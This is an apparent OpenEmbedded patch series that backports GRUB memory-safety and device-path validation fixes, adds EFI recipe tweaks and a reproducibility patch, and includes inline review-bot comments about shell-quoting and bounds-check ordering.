+++ b/meta/lib/oeqa/utils/targetbuild.py
@@ -19,6 +19,7 @@ class BuildProject(metaclass=ABCMeta):
self.d = d
self.uri = uri
self.archive = os.path.basename(uri)
+ self.tempdirobj = None
if not tmpdir:
tmpdir = self.d.getVar('WORKDIR')
if not tmpdir:
@@ -71,9 +72,10 @@ class BuildProject(metaclass=ABCMeta):
return self._run('cd %s; make install %s' % (self.targetdir, install_args))
def clean(self):
+ if self.tempdirobj:
+ self.tempdirobj.cleanup()
self._run('rm -rf %s' % self.targetdir)
subprocess.check_call('rm -f %s' % self.localarchive, shell=True)
- pass
class TargetBuildProject(BuildProject):
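Review bot: `clean()` still builds both removal commands by string interpolation, `'rm -rf %s' % self.targetdir` and `subprocess.check_call('rm -f %s' % self.localarchive, shell=True)`, so a path containing spaces or shell metacharacters is interpreted by the shell. The archive name comes from `os.path.basename(uri)` in the constructor, and `localarchive` is presumably built from it. These are unchanged context lines, but since the method is being edited the local call can become `subprocess.check_call(['rm', '-f', self.localarchive])`, and the `_run` argument can be wrapped in `shlex.quote()` if `shlex` is imported in the file. The new `self.tempdirobj.cleanup()` runs first, so if it raises, the two removals below are skipped.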
diff --git a/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb b/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb
index 5d6f200a73..e9dfa0770e 100644
--- a/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb
+++ b/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb
@@ -10,7 +10,7 @@ DEPENDS = "efivar popt"
COMPATIBLE_HOST = "(i.86|x86_64|arm|aarch64).*-linux"
-SRC_URI = "git://github.com/rhinstaller/efibootmgr.git;protocol=https \
+SRC_URI = "git://github.com/rhinstaller/efibootmgr.git;protocol=https;branch=master \
file://0001-remove-extra-decl.patch \
file://97668ae0bce776a36ea2001dea63d376be8274ac.patch \
"
diff --git a/meta/recipes-bsp/efivar/efivar/determinism.patch b/meta/recipes-bsp/efivar/efivar/determinism.patch
new file mode 100644
index 0000000000..bdf6bfc4a8
--- /dev/null
+++ b/meta/recipes-bsp/efivar/efivar/determinism.patch
@@ -0,0 +1,18 @@
+Fix reproducibility issue caused by unsorted wildcard expansion.
+
+Upstream-Status: Pending
+RP 2021/3/1
+
+Index: git/src/Makefile
+===================================================================
+--- git.orig/src/Makefile
++++ git/src/Makefile
+@@ -15,7 +15,7 @@ TARGETS=$(LIBTARGETS) $(BINTARGETS) $(PC
+ STATICTARGETS=$(STATICLIBTARGETS) $(STATICBINTARGETS)
+
+ LIBEFIBOOT_SOURCES = crc32.c creator.c disk.c gpt.c loadopt.c path-helpers.c \
+- linux.c $(wildcard linux-*.c)
++ linux.c $(sort $(wildcard linux-*.c))
+ LIBEFIBOOT_OBJECTS = $(patsubst %.c,%.o,$(LIBEFIBOOT_SOURCES))
+ LIBEFIVAR_SOURCES = dp.c dp-acpi.c dp-hw.c dp-media.c dp-message.c \
+ efivarfs.c error.c export.c guid.c guids.S guid-symbols.c \
diff --git a/meta/recipes-bsp/efivar/efivar_37.bb b/meta/recipes-bsp/efivar/efivar_37.bb
index 9b95721a4e..858c61ae6a 100644
--- a/meta/recipes-bsp/efivar/efivar_37.bb
+++ b/meta/recipes-bsp/efivar/efivar_37.bb
@@ -7,7 +7,8 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=6626bb1e20189cfa95f2c508ba286393"
COMPATIBLE_HOST = "(i.86|x86_64|arm|aarch64).*-linux"
-SRC_URI = "git://github.com/rhinstaller/efivar.git \
+SRC_URI = "git://github.com/rhinstaller/efivar.git;branch=main;protocol=https \
+ file://determinism.patch \
file://no-werror.patch"
SRCREV = "c1d6b10e1ed4ba2be07f385eae5bceb694478a10"
diff --git a/meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb b/meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb
index 9954d7f57a..191b0bc176 100644
--- a/meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb
+++ b/meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb
@@ -1,5 +1,6 @@
SUMMARY = "Libraries for producing EFI binaries"
HOMEPAGE = "http://sourceforge.net/projects/gnu-efi/"
+DESCRIPTION = "GNU-EFI aims to Develop EFI applications for ARM-64, ARM-32, x86_64, IA-64 (IPF), IA-32 (x86), and MIPS platforms using the GNU toolchain and the EFI development environment."
SECTION = "devel"
LICENSE = "GPLv2+ | BSD-2-Clause"
LIC_FILES_CHKSUM = "file://gnuefi/crt0-efi-arm.S;beginline=4;endline=16;md5=e582764a4776e60c95bf9ab617343d36 \
diff --git a/meta/recipes-bsp/grub/files/0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch b/meta/recipes-bsp/grub/files/0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch
new file mode 100644
index 0000000000..eaaa7effae
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch
@@ -0,0 +1,39 @@
+From 0900f11def2e7fbb4880efff0cd9c9b32f1cdb86 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 3 Dec 2020 14:39:45 +0000
+Subject: [PATCH] mmap: Fix memory leak when iterating over mapped memory
+
+When returning from grub_mmap_iterate() the memory allocated to present
+is not being released causing it to leak.
+
+Fixes: CID 96655
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=8cb2848f9699642a698af84b12ba187cab722031]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/mmap/mmap.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/grub-core/mmap/mmap.c b/grub-core/mmap/mmap.c
+index 7ebf32e..8bf235f 100644
+--- a/grub-core/mmap/mmap.c
++++ b/grub-core/mmap/mmap.c
+@@ -270,6 +270,7 @@ grub_mmap_iterate (grub_memory_hook_t hook, void *hook_data)
+ hook_data))
+ {
+ grub_free (ctx.scanline_events);
++ grub_free (present);
+ return GRUB_ERR_NONE;
+ }
+
+@@ -282,6 +283,7 @@ grub_mmap_iterate (grub_memory_hook_t hook, void *hook_data)
+ }
+
+ grub_free (ctx.scanline_events);
++ grub_free (present);
+ return GRUB_ERR_NONE;
+ }
+
diff --git a/meta/recipes-bsp/grub/files/0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch b/meta/recipes-bsp/grub/files/0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch
new file mode 100644
index 0000000000..d00821f5c3
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch
@@ -0,0 +1,39 @@
+From f216a75e884ed5e4e94bf86965000dde51148f94 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 27 Nov 2020 15:10:26 +0000
+Subject: [PATCH] net/net: Fix possible dereference to of a NULL pointer
+
+It is always possible that grub_zalloc() could fail, so we should check for
+a NULL return. Otherwise we run the risk of dereferencing a NULL pointer.
+
+Fixes: CID 296221
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=03f2515ae0c503406f1a99a2178405049c6555db]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/net/net.c | 9 +++++++--
+ 1 file changed, 7 insertions(+), 2 deletions(-)
+
+diff --git a/grub-core/net/net.c b/grub-core/net/net.c
+index 38f19df..7c2cdf2 100644
+--- a/grub-core/net/net.c
++++ b/grub-core/net/net.c
+@@ -86,8 +86,13 @@ grub_net_link_layer_add_address (struct grub_net_card *card,
+
+ /* Add sender to cache table. */
+ if (card->link_layer_table == NULL)
+- card->link_layer_table = grub_zalloc (LINK_LAYER_CACHE_SIZE
+- * sizeof (card->link_layer_table[0]));
++ {
++ card->link_layer_table = grub_zalloc (LINK_LAYER_CACHE_SIZE
++ * sizeof (card->link_layer_table[0]));
++ if (card->link_layer_table == NULL)
++ return;
++ }
++
+ entry = &(card->link_layer_table[card->new_ll_entry]);
+ entry->avail = 1;
+ grub_memcpy (&entry->ll_address, ll, sizeof (entry->ll_address));
diff --git a/meta/recipes-bsp/grub/files/0003-net-tftp-Fix-dangling-memory-pointer.patch b/meta/recipes-bsp/grub/files/0003-net-tftp-Fix-dangling-memory-pointer.patch
new file mode 100644
index 0000000000..3b4633507d
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0003-net-tftp-Fix-dangling-memory-pointer.patch
@@ -0,0 +1,33 @@
+From 09cc0df477758b60f51fbc0da1dee2f5d54c333d Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 19 Feb 2021 17:12:23 +0000
+Subject: [PATCH] net/tftp: Fix dangling memory pointer
+
+The static code analysis tool, Parfait, reported that the valid of
+file->data was left referencing memory that was freed by the call to
+grub_free(data) where data was initialized from file->data.
+
+To ensure that there is no unintentional access to this memory
+referenced by file->data we should set the pointer to NULL.
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=0cb838b281a68b536a09681f9557ea6a7ac5da7a]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/net/tftp.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/grub-core/net/tftp.c b/grub-core/net/tftp.c
+index 7d90bf6..f76b19f 100644
+--- a/grub-core/net/tftp.c
++++ b/grub-core/net/tftp.c
+@@ -468,6 +468,7 @@ tftp_close (struct grub_file *file)
+ }
+ destroy_pq (data);
+ grub_free (data);
++ file->data = NULL;
+ return GRUB_ERR_NONE;
+ }
+
diff --git a/meta/recipes-bsp/grub/files/0004-kern-parser-Fix-resource-leak-if-argc-0.patch b/meta/recipes-bsp/grub/files/0004-kern-parser-Fix-resource-leak-if-argc-0.patch
new file mode 100644
index 0000000000..933416605c
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0004-kern-parser-Fix-resource-leak-if-argc-0.patch
@@ -0,0 +1,50 @@
+From 8861fa6226f7229105722ba669465e879b56ee2b Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 22 Jan 2021 12:32:41 +0000
+Subject: [PATCH] kern/parser: Fix resource leak if argc == 0
+
+After processing the command-line yet arriving at the point where we are
+setting argv, we are allocating memory, even if argc == 0, which makes
+no sense since we never put anything into the allocated argv.
+
+The solution is to simply return that we've successfully processed the
+arguments but that argc == 0, and also ensure that argv is NULL when
+we're not allocating anything in it.
+
+There are only 2 callers of this function, and both are handling a zero
+value in argc assuming nothing is allocated in argv.
+
+Fixes: CID 96680
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d06161b035dde4769199ad65aa0a587a5920012b]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/parser.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/grub-core/kern/parser.c b/grub-core/kern/parser.c
+index 619db31..d1cf061 100644
+--- a/grub-core/kern/parser.c
++++ b/grub-core/kern/parser.c
+@@ -146,6 +146,7 @@ grub_parser_split_cmdline (const char *cmdline,
+ int i;
+
+ *argc = 0;
++ *argv = NULL;
+ do
+ {
+ if (!rd || !*rd)
+@@ -207,6 +208,10 @@ grub_parser_split_cmdline (const char *cmdline,
+ (*argc)++;
+ }
+
++ /* If there are no args, then we're done. */
++ if (!*argc)
++ return 0;
++
+ /* Reserve memory for the return values. */
+ args = grub_malloc (bp - buffer);
+ if (!args)
diff --git a/meta/recipes-bsp/grub/files/0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch b/meta/recipes-bsp/grub/files/0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch
new file mode 100644
index 0000000000..04748befc8
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch
@@ -0,0 +1,235 @@
+From 16a4d739b19f8680cf93a3c8fa0ae9fc1b1c310b Mon Sep 17 00:00:00 2001
+From: Peter Jones <pjones@redhat.com>
+Date: Sun, 19 Jul 2020 16:53:27 -0400
+Subject: [PATCH] efi: Fix some malformed device path arithmetic errors
+
+Several places we take the length of a device path and subtract 4 from
+it, without ever checking that it's >= 4. There are also cases where
+this kind of malformation will result in unpredictable iteration,
+including treating the length from one dp node as the type in the next
+node. These are all errors, no matter where the data comes from.
+
+This patch adds a checking macro, GRUB_EFI_DEVICE_PATH_VALID(), which
+can be used in several places, and makes GRUB_EFI_NEXT_DEVICE_PATH()
+return NULL and GRUB_EFI_END_ENTIRE_DEVICE_PATH() evaluate as true when
+the length is too small. Additionally, it makes several places in the
+code check for and return errors in these cases.
+
+Signed-off-by: Peter Jones <pjones@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d2cf823d0e31818d1b7a223daff6d5e006596543]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/efi/efi.c | 64 +++++++++++++++++++++++++-----
+ grub-core/loader/efi/chainloader.c | 13 +++++-
+ grub-core/loader/i386/xnu.c | 9 +++--
+ include/grub/efi/api.h | 14 ++++---
+ 4 files changed, 79 insertions(+), 21 deletions(-)
+
+diff --git a/grub-core/kern/efi/efi.c b/grub-core/kern/efi/efi.c
+index ad170c7..6a38080 100644
+--- a/grub-core/kern/efi/efi.c
++++ b/grub-core/kern/efi/efi.c
+@@ -360,7 +360,7 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
+
+ dp = dp0;
+
+- while (1)
++ while (dp)
+ {
+ grub_efi_uint8_t type = GRUB_EFI_DEVICE_PATH_TYPE (dp);
+ grub_efi_uint8_t subtype = GRUB_EFI_DEVICE_PATH_SUBTYPE (dp);
+@@ -370,9 +370,15 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
+ if (type == GRUB_EFI_MEDIA_DEVICE_PATH_TYPE
+ && subtype == GRUB_EFI_FILE_PATH_DEVICE_PATH_SUBTYPE)
+ {
+- grub_efi_uint16_t len;
+- len = ((GRUB_EFI_DEVICE_PATH_LENGTH (dp) - 4)
+- / sizeof (grub_efi_char16_t));
++ grub_efi_uint16_t len = GRUB_EFI_DEVICE_PATH_LENGTH (dp);
++
++ if (len < 4)
++ {
++ grub_error (GRUB_ERR_OUT_OF_RANGE,
++ "malformed EFI Device Path node has length=%d", len);
++ return NULL;
++ }
++ len = (len - 4) / sizeof (grub_efi_char16_t);
+ filesize += GRUB_MAX_UTF8_PER_UTF16 * len + 2;
+ }
+
+@@ -388,7 +394,7 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
+ if (!name)
+ return NULL;
+
+- while (1)
++ while (dp)
+ {
+ grub_efi_uint8_t type = GRUB_EFI_DEVICE_PATH_TYPE (dp);
+ grub_efi_uint8_t subtype = GRUB_EFI_DEVICE_PATH_SUBTYPE (dp);
+@@ -404,8 +410,15 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
+
+ *p++ = '/';
+
+- len = ((GRUB_EFI_DEVICE_PATH_LENGTH (dp) - 4)
+- / sizeof (grub_efi_char16_t));
++ len = GRUB_EFI_DEVICE_PATH_LENGTH (dp);
++ if (len < 4)
++ {
++ grub_error (GRUB_ERR_OUT_OF_RANGE,
++ "malformed EFI Device Path node has length=%d", len);
++ return NULL;
++ }
++
++ len = (len - 4) / sizeof (grub_efi_char16_t);
+ fp = (grub_efi_file_path_device_path_t *) dp;
+ /* According to EFI spec Path Name is NULL terminated */
+ while (len > 0 && fp->path_name[len - 1] == 0)
+@@ -480,7 +493,26 @@ grub_efi_duplicate_device_path (const grub_efi_device_path_t *dp)
+ ;
+ p = GRUB_EFI_NEXT_DEVICE_PATH (p))
+ {
+- total_size += GRUB_EFI_DEVICE_PATH_LENGTH (p);
++ grub_size_t len = GRUB_EFI_DEVICE_PATH_LENGTH (p);
++
++ /*
++ * In the event that we find a node that's completely garbage, for
++ * example if we get to 0x7f 0x01 0x02 0x00 ... (EndInstance with a size
++ * of 2), GRUB_EFI_END_ENTIRE_DEVICE_PATH() will be true and
++ * GRUB_EFI_NEXT_DEVICE_PATH() will return NULL, so we won't continue,
++ * and neither should our consumers, but there won't be any error raised
++ * even though the device path is junk.
++ *
++ * This keeps us from passing junk down back to our caller.
++ */
++ if (len < 4)
++ {
++ grub_error (GRUB_ERR_OUT_OF_RANGE,
++ "malformed EFI Device Path node has length=%d", len);
++ return NULL;
++ }
++
++ total_size += len;
+ if (GRUB_EFI_END_ENTIRE_DEVICE_PATH (p))
+ break;
+ }
+@@ -525,7 +557,7 @@ dump_vendor_path (const char *type, grub_efi_vendor_device_path_t *vendor)
+ void
+ grub_efi_print_device_path (grub_efi_device_path_t *dp)
+ {
+- while (1)
++ while (GRUB_EFI_DEVICE_PATH_VALID (dp))
+ {
+ grub_efi_uint8_t type = GRUB_EFI_DEVICE_PATH_TYPE (dp);
+ grub_efi_uint8_t subtype = GRUB_EFI_DEVICE_PATH_SUBTYPE (dp);
+@@ -937,7 +969,10 @@ grub_efi_compare_device_paths (const grub_efi_device_path_t *dp1,
+ /* Return non-zero. */
+ return 1;
+
+- while (1)
++ if (dp1 == dp2)
++ return 0;
++
++ while (GRUB_EFI_DEVICE_PATH_VALID (dp1) && GRUB_EFI_DEVICE_PATH_VALID (dp2))
+ {
+ grub_efi_uint8_t type1, type2;
+ grub_efi_uint8_t subtype1, subtype2;
+@@ -973,5 +1008,14 @@ grub_efi_compare_device_paths (const grub_efi_device_path_t *dp1,
+ dp2 = (grub_efi_device_path_t *) ((char *) dp2 + len2);
+ }
+
++ /*
++ * There's no "right" answer here, but we probably don't want to call a valid
++ * dp and an invalid dp equal, so pick one way or the other.
++ */
++ if (GRUB_EFI_DEVICE_PATH_VALID (dp1) && !GRUB_EFI_DEVICE_PATH_VALID (dp2))
++ return 1;
++ else if (!GRUB_EFI_DEVICE_PATH_VALID (dp1) && GRUB_EFI_DEVICE_PATH_VALID (dp2))
++ return -1;
++
+ return 0;
+ }
+diff --git a/grub-core/loader/efi/chainloader.c b/grub-core/loader/efi/chainloader.c
+index daf8c6b..a8d7b91 100644
+--- a/grub-core/loader/efi/chainloader.c
++++ b/grub-core/loader/efi/chainloader.c
+@@ -156,9 +156,18 @@ make_file_path (grub_efi_device_path_t *dp, const char *filename)
+
+ size = 0;
+ d = dp;
+- while (1)
++ while (d)
+ {
+- size += GRUB_EFI_DEVICE_PATH_LENGTH (d);
++ grub_size_t len = GRUB_EFI_DEVICE_PATH_LENGTH (d);
++
++ if (len < 4)
++ {
++ grub_error (GRUB_ERR_OUT_OF_RANGE,
++ "malformed EFI Device Path node has length=%d", len);
++ return NULL;
++ }
++
++ size += len;
+ if ((GRUB_EFI_END_ENTIRE_DEVICE_PATH (d)))
+ break;
+ d = GRUB_EFI_NEXT_DEVICE_PATH (d);
+diff --git a/grub-core/loader/i386/xnu.c b/grub-core/loader/i386/xnu.c
+index b7d176b..c50cb54 100644
+--- a/grub-core/loader/i386/xnu.c
++++ b/grub-core/loader/i386/xnu.c
+@@ -516,14 +516,15 @@ grub_cmd_devprop_load (grub_command_t cmd __attribute__ ((unused)),
+
+ devhead = buf;
+ buf = devhead + 1;
+- dpstart = buf;
++ dp = dpstart = buf;
+
+- do
++ while (GRUB_EFI_DEVICE_PATH_VALID (dp) && buf < bufend)
+ {
+- dp = buf;
+ buf = (char *) buf + GRUB_EFI_DEVICE_PATH_LENGTH (dp);
++ if (GRUB_EFI_END_ENTIRE_DEVICE_PATH (dp))
++ break;
++ dp = buf;
+ }
+- while (!GRUB_EFI_END_ENTIRE_DEVICE_PATH (dp) && buf < bufend);
+
+ dev = grub_xnu_devprop_add_device (dpstart, (char *) buf
+ - (char *) dpstart);
+diff --git a/include/grub/efi/api.h b/include/grub/efi/api.h
+index addcbfa..cf1355a 100644
+--- a/include/grub/efi/api.h
++++ b/include/grub/efi/api.h
+@@ -625,6 +625,7 @@ typedef struct grub_efi_device_path grub_efi_device_path_protocol_t;
+ #define GRUB_EFI_DEVICE_PATH_TYPE(dp) ((dp)->type & 0x7f)
+ #define GRUB_EFI_DEVICE_PATH_SUBTYPE(dp) ((dp)->subtype)
+ #define GRUB_EFI_DEVICE_PATH_LENGTH(dp) ((dp)->length)
++#define GRUB_EFI_DEVICE_PATH_VALID(dp) ((dp) != NULL && GRUB_EFI_DEVICE_PATH_LENGTH (dp) >= 4)
+
+ /* The End of Device Path nodes. */
+ #define GRUB_EFI_END_DEVICE_PATH_TYPE (0xff & 0x7f)
+@@ -633,13 +634,16 @@ typedef struct grub_efi_device_path grub_efi_device_path_protocol_t;
+ #define GRUB_EFI_END_THIS_DEVICE_PATH_SUBTYPE 0x01
+
+ #define GRUB_EFI_END_ENTIRE_DEVICE_PATH(dp) \
+- (GRUB_EFI_DEVICE_PATH_TYPE (dp) == GRUB_EFI_END_DEVICE_PATH_TYPE \
+- && (GRUB_EFI_DEVICE_PATH_SUBTYPE (dp) \
+- == GRUB_EFI_END_ENTIRE_DEVICE_PATH_SUBTYPE))
++ (!GRUB_EFI_DEVICE_PATH_VALID (dp) || \
++ (GRUB_EFI_DEVICE_PATH_TYPE (dp) == GRUB_EFI_END_DEVICE_PATH_TYPE \
++ && (GRUB_EFI_DEVICE_PATH_SUBTYPE (dp) \
++ == GRUB_EFI_END_ENTIRE_DEVICE_PATH_SUBTYPE)))
+
+ #define GRUB_EFI_NEXT_DEVICE_PATH(dp) \
+- ((grub_efi_device_path_t *) ((char *) (dp) \
+- + GRUB_EFI_DEVICE_PATH_LENGTH (dp)))
++ (GRUB_EFI_DEVICE_PATH_VALID (dp) \
++ ? ((grub_efi_device_path_t *) \
++ ((char *) (dp) + GRUB_EFI_DEVICE_PATH_LENGTH (dp))) \
++ : NULL)
+
+ /* Hardware Device Path. */
+ #define GRUB_EFI_HARDWARE_DEVICE_PATH_TYPE 1
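Review bot: In the xnu.c part, `while (GRUB_EFI_DEVICE_PATH_VALID (dp) && buf < bufend)` reads `dp->length` before the bounds test, and after the first pass `dp` equals `buf`, so the node header is read even when `buf` has reached `bufend`. Testing the bound first, `while (buf < bufend && GRUB_EFI_DEVICE_PATH_VALID (dp))`, avoids that read. `GRUB_EFI_DEVICE_PATH_VALID` only checks `length >= 4`, so a node whose length runs past the buffer still needs a check against the remaining size, which the macro cannot do. Separately, `grub_efi_duplicate_device_path` and `make_file_path` declare `grub_size_t len` but print it with `%d`; `"malformed EFI Device Path node has length=%" PRIuGRUB_SIZE, len` matches the type. As this is a backport, both points are better raised upstream than fixed locally.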
diff --git a/meta/recipes-bsp/grub/files/0006-kern-efi-Fix-memory-leak-on-failure.patch b/meta/recipes-bsp/grub/files/0006-kern-efi-Fix-memory-leak-on-failure.patch
new file mode 100644
index 0000000000..9d7327cee6
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0006-kern-efi-Fix-memory-leak-on-failure.patch
@@ -0,0 +1,30 @@
+From d4fd0243920b71cc6e03cc0cadf23b4fe03c352f Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 5 Nov 2020 10:15:25 +0000
+Subject: [PATCH] kern/efi: Fix memory leak on failure
+
+Free the memory allocated to name before returning on failure.
+
+Fixes: CID 296222
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=ed286ceba6015d37a9304f04602451c47bf195d7]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/efi/efi.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/grub-core/kern/efi/efi.c b/grub-core/kern/efi/efi.c
+index 6a38080..baeeef0 100644
+--- a/grub-core/kern/efi/efi.c
++++ b/grub-core/kern/efi/efi.c
+@@ -415,6 +415,7 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
+ {
+ grub_error (GRUB_ERR_OUT_OF_RANGE,
+ "malformed EFI Device Path node has length=%d", len);
++ grub_free (name);
+ return NULL;
+ }
+
diff --git a/meta/recipes-bsp/grub/files/0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch b/meta/recipes-bsp/grub/files/0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch
new file mode 100644
index 0000000000..d55709406b
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch
@@ -0,0 +1,65 @@
+From be03a18b8767be50f16a845c389fd5ed29aae055 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 11 Dec 2020 15:03:13 +0000
+Subject: [PATCH] kern/efi/mm: Fix possible NULL pointer dereference
+
+The model of grub_efi_get_memory_map() is that if memory_map is NULL,
+then the purpose is to discover how much memory should be allocated to
+it for the subsequent call.
+
+The problem here is that with grub_efi_is_finished set to 1, there is no
+check at all that the function is being called with a non-NULL memory_map.
+
+While this MAY be true, we shouldn't assume it.
+
+The solution to this is to behave as expected, and if memory_map is NULL,
+then don't try to use it and allow memory_map_size to be filled in, and
+return 0 as is done later in the code if the buffer is too small (or NULL).
+
+Additionally, drop unneeded ret = 1.
+
+Fixes: CID 96632
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=6aee4bfd6973c714056fb7b56890b8d524e94ee1]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/efi/mm.c | 19 ++++++++++++++-----
+ 1 file changed, 14 insertions(+), 5 deletions(-)
+
+diff --git a/grub-core/kern/efi/mm.c b/grub-core/kern/efi/mm.c
+index b02fab1..5afcef7 100644
+--- a/grub-core/kern/efi/mm.c
++++ b/grub-core/kern/efi/mm.c
+@@ -328,15 +328,24 @@ grub_efi_get_memory_map (grub_efi_uintn_t *memory_map_size,
+ if (grub_efi_is_finished)
+ {
+ int ret = 1;
+- if (*memory_map_size < finish_mmap_size)
++
++ if (memory_map != NULL)
+ {
+- grub_memcpy (memory_map, finish_mmap_buf, *memory_map_size);
+- ret = 0;
++ if (*memory_map_size < finish_mmap_size)
++ {
++ grub_memcpy (memory_map, finish_mmap_buf, *memory_map_size);
++ ret = 0;
++ }
++ else
++ grub_memcpy (memory_map, finish_mmap_buf, finish_mmap_size);
+ }
+ else
+ {
+- grub_memcpy (memory_map, finish_mmap_buf, finish_mmap_size);
+- ret = 1;
++ /*
++ * Incomplete, no buffer to copy into, same as
++ * GRUB_EFI_BUFFER_TOO_SMALL below.
++ */
++ ret = 0;
+ }
+ *memory_map_size = finish_mmap_size;
+ if (map_key)
diff --git a/meta/recipes-bsp/grub/files/0008-gnulib-regexec-Resolve-unused-variable.patch b/meta/recipes-bsp/grub/files/0008-gnulib-regexec-Resolve-unused-variable.patch
new file mode 100644
index 0000000000..74ffb559e9
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0008-gnulib-regexec-Resolve-unused-variable.patch
@@ -0,0 +1,59 @@
+From 9d36bce5d516b6379ba3a0dd1a94a9c035838827 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Wed, 21 Oct 2020 14:41:27 +0000
+Subject: [PATCH] gnulib/regexec: Resolve unused variable
+
+This is a really minor issue where a variable is being assigned to but
+not checked before it is overwritten again.
+
+The reason for this issue is that we are not building with DEBUG set and
+this in turn means that the assert() that reads the value of the
+variable match_last is being processed out.
+
+The solution, move the assignment to match_last in to an ifdef DEBUG too.
+
+Fixes: CID 292459
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=a983d36bd9178d377d2072fd4b11c635fdc404b4]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.extra-dist | 1 +
+ .../lib/gnulib-patches/fix-unused-value.patch | 14 ++++++++++++++
+ 2 files changed, 15 insertions(+)
+ create mode 100644 grub-core/lib/gnulib-patches/fix-unused-value.patch
+
+diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
+index 46c4e95..9b01152 100644
+--- a/conf/Makefile.extra-dist
++++ b/conf/Makefile.extra-dist
+@@ -29,6 +29,7 @@ EXTRA_DIST += grub-core/genemuinit.sh
+ EXTRA_DIST += grub-core/genemuinitheader.sh
+
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
++EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-width.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/no-abort.patch
+
